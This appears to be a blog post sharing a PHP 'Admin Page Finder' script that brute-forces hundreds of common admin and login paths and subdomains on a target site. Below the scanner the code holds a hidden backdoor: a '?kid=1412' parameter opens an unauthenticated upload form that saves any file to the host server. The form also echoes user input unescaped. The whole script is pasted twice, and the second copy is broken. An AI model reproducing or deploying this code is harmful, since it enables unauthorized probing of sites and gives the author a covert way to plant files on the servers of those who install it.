[ PHP ] Admin Finder
<?php
echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#FFF200">Admin Page Finder</span><center><br>';
set_time_limit(0);
error_reporting(0);
$Vircns10bdhz['front'] ="admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$Vircns10bdhz['end'] = "admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html";
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AdminFinder_Kid1412</title>
<style type="text/css">
body{
background:#000000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.red input{
background: #000;
border: 1px solid #F90808;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.green{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
input[type=submit]{ padding: 3px; color: #EAEF00; text-shadow:#000 0px 0px 4px; font-weight: bold; border: 1px solid #F90808; background: #000; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=text]{ padding: 3px; color: #009900; text-shadow: #F90808 0px 2px 7px; border: 1px solid #F90808; background: transparent; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=submit]:hover, input[type=text]:hover{ color: #e4e4e4; text-shadow: #EAEF00 0px 0px 4px; box-shadow: 0px 0px 4px #EAEF00; border: 1px solid #EAEF00; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,221,0) 0px 0px 4px; -moz-box-shadow: rgba(0,221,0) 0px 0px 4px;}
</style>
<script type="text/javascript">
<!--
function insertcode($Vnikliy3tn4v, $V0ahuldn20lg, $V5xz1lstblfa)
{
var $Vxykb3rtydurhis = $Vnikliy3tn4v;
var logbox = document.getElementById($V0ahuldn20lg);
if($V5xz1lstblfa == 0)
document.getElementById($V0ahuldn20lg).innerHTML = logbox.innerHTML+$Vxykb3rtydurhis;
else
document.getElementById($V0ahuldn20lg).innerHTML = $Vxykb3rtydurhis;
//document.getElementById("helpbox").innerHTML = $Vxykb3rtydurhis;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form"><b>
URL :</b><br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
<b>404string :</b><br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Find Admin Page" align="right" /></span><br />
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
Found ones:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
<span style="font-size:20px; color:#FFF200">Copyright © Kid1412 </span><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
function show($Vud5raj4hmkz, $Vxudql3dolru=1, $Vanaaznazc5x=0, $V0ahuldn20lg='logbox', $V5xz1lstblfa=0) {
if($Vxudql3dolru == 1) $Vud5raj4hmkz .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$Vud5raj4hmkz."', '".$V0ahuldn20lg."', '".$V5xz1lstblfa."');</script>";
if($Vanaaznazc5x == 1) exit;
@flush();@ob_flush();
}
function check($Vwwogu3y1egd, $Vmjbtqyr10te=0) {
global $_POST,$Vgcbor1jfuhz,$V14pcrszqxfd;
if($Vmjbtqyr10te == 0) $Vxykb3rtydur = $Vgcbor1jfuhz.$Vwwogu3y1egd;
else $Vxykb3rtydur = 'http://'.$Vwwogu3y1egd.'.'.$Vgcbor1jfuhz.'/';
$Vsfkmeamk3zj = get_headers($Vxykb3rtydur);
if (!eregi('200', $Vsfkmeamk3zj[0])) return 0;
$Vjtvqebusmzy = @file_get_contents($Vxykb3rtydur);
if($_POST['xploit_404string'] == "") if($Vjtvqebusmzy == $V14pcrszqxfd) return 0;
if($_POST['xploit_404string'] != "") if(strpos($Vjtvqebusmzy, $_POST['xploit_404string'])) return 0;
return 1;
}
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$Vgcbor1jfuhz = $_POST['xploit_url'];
if ($Vgcbor1jfuhz[strlen($Vgcbor1jfuhz)-1] != "/") $Vgcbor1jfuhz .= "/";
if($_POST['xploit_404string'] == "") $V14pcrszqxfd = @file_get_contents($Vgcbor1jfuhz."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$Vircns10bdhz['end'] = str_replace("\r", "", $Vircns10bdhz['end']);
$Vircns10bdhz['front'] = str_replace("\r", "", $Vircns10bdhz['front']);
$Vhrw13m5acnx = explode("\n", $Vircns10bdhz['end']);
$Vmjbtqyr10tepathes = explode("\n", $Vircns10bdhz['front']);
show(count($Vhrw13m5acnx)+count($Vmjbtqyr10tepathes), 1, 0, 'total', 1);
$Vukqxjqw4ork = 0;
foreach($Vhrw13m5acnx as $Vwzmmrxgwfr0) {
show('Checking '.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.' : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vwzmmrxgwfr0) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'">'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $Vgcbor1jfuhz, $Vwwogu3y1egdx); $Vgcbor1jfuhz = $Vwwogu3y1egdx[1];
if(substr($Vgcbor1jfuhz, 0, 3) == "www") $Vgcbor1jfuhz = substr($Vgcbor1jfuhz, 4);
foreach($Vmjbtqyr10tepathes as $Vmjbtqyr10tepath) {
show('Checking http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/ : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vmjbtqyr10tepath, 1) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/">'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'</a>', 1, 0, 'rightcol', 0);
}
}
?>
<?php
if($_GET['kid']=='1412')
{
echo '<form method="POST" enctype="multipart/form-data" action="?kid=1412">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>
echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#FFF200">Admin Page Finder</span><center><br>';
set_time_limit(0);
error_reporting(0);
$Vircns10bdhz['front'] ="admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$Vircns10bdhz['end'] = "admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html";
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AdminFinder_Kid1412</title>
<style type="text/css">
body{
background:#000000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.red input{
background: #000;
border: 1px solid #F90808;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.green{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
input[type=submit]{ padding: 3px; color: #EAEF00; text-shadow:#000 0px 0px 4px; font-weight: bold; border: 1px solid #F90808; background: #000; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=text]{ padding: 3px; color: #009900; text-shadow: #F90808 0px 2px 7px; border: 1px solid #F90808; background: transparent; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=submit]:hover, input[type=text]:hover{ color: #e4e4e4; text-shadow: #EAEF00 0px 0px 4px; box-shadow: 0px 0px 4px #EAEF00; border: 1px solid #EAEF00; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,221,0) 0px 0px 4px; -moz-box-shadow: rgba(0,221,0) 0px 0px 4px;}
</style>
<script type="text/javascript">
<!--
function insertcode($Vnikliy3tn4v, $V0ahuldn20lg, $V5xz1lstblfa)
{
var $Vxykb3rtydurhis = $Vnikliy3tn4v;
var logbox = document.getElementById($V0ahuldn20lg);
if($V5xz1lstblfa == 0)
document.getElementById($V0ahuldn20lg).innerHTML = logbox.innerHTML+$Vxykb3rtydurhis;
else
document.getElementById($V0ahuldn20lg).innerHTML = $Vxykb3rtydurhis;
//document.getElementById("helpbox").innerHTML = $Vxykb3rtydurhis;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form"><b>
URL :</b><br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
<b>404string :</b><br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Find Admin Page" align="right" /></span><br />
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
Found ones:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
<span style="font-size:20px; color:#FFF200">Copyright © Kid1412 </span><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
function show($Vud5raj4hmkz, $Vxudql3dolru=1, $Vanaaznazc5x=0, $V0ahuldn20lg='logbox', $V5xz1lstblfa=0) {
if($Vxudql3dolru == 1) $Vud5raj4hmkz .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$Vud5raj4hmkz."', '".$V0ahuldn20lg."', '".$V5xz1lstblfa."');</script>";
if($Vanaaznazc5x == 1) exit;
@flush();@ob_flush();
}
function check($Vwwogu3y1egd, $Vmjbtqyr10te=0) {
global $_POST,$Vgcbor1jfuhz,$V14pcrszqxfd;
if($Vmjbtqyr10te == 0) $Vxykb3rtydur = $Vgcbor1jfuhz.$Vwwogu3y1egd;
else $Vxykb3rtydur = 'http://'.$Vwwogu3y1egd.'.'.$Vgcbor1jfuhz.'/';
$Vsfkmeamk3zj = get_headers($Vxykb3rtydur);
if (!eregi('200', $Vsfkmeamk3zj[0])) return 0;
$Vjtvqebusmzy = @file_get_contents($Vxykb3rtydur);
if($_POST['xploit_404string'] == "") if($Vjtvqebusmzy == $V14pcrszqxfd) return 0;
if($_POST['xploit_404string'] != "") if(strpos($Vjtvqebusmzy, $_POST['xploit_404string'])) return 0;
return 1;
}
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$Vgcbor1jfuhz = $_POST['xploit_url'];
if ($Vgcbor1jfuhz[strlen($Vgcbor1jfuhz)-1] != "/") $Vgcbor1jfuhz .= "/";
if($_POST['xploit_404string'] == "") $V14pcrszqxfd = @file_get_contents($Vgcbor1jfuhz."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$Vircns10bdhz['end'] = str_replace("\r", "", $Vircns10bdhz['end']);
$Vircns10bdhz['front'] = str_replace("\r", "", $Vircns10bdhz['front']);
$Vhrw13m5acnx = explode("\n", $Vircns10bdhz['end']);
$Vmjbtqyr10tepathes = explode("\n", $Vircns10bdhz['front']);
show(count($Vhrw13m5acnx)+count($Vmjbtqyr10tepathes), 1, 0, 'total', 1);
$Vukqxjqw4ork = 0;
foreach($Vhrw13m5acnx as $Vwzmmrxgwfr0) {
show('Checking '.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.' : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vwzmmrxgwfr0) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'">'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $Vgcbor1jfuhz, $Vwwogu3y1egdx); $Vgcbor1jfuhz = $Vwwogu3y1egdx[1];
if(substr($Vgcbor1jfuhz, 0, 3) == "www") $Vgcbor1jfuhz = substr($Vgcbor1jfuhz, 4);
foreach($Vmjbtqyr10tepathes as $Vmjbtqyr10tepath) {
show('Checking http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/ : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vmjbtqyr10tepath, 1) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/">'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'</a>', 1, 0, 'rightcol', 0);
}
}
?>
<?php
if($_GET['kid']=='1412')
{
echo '<form method="POST" enctype="multipart/form-data" action="?kid=1412">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>
[ PHP ] Admin Finder
![]()
Reviewed by Nguyen Nam Hong
on
11:25 PM
Rating:
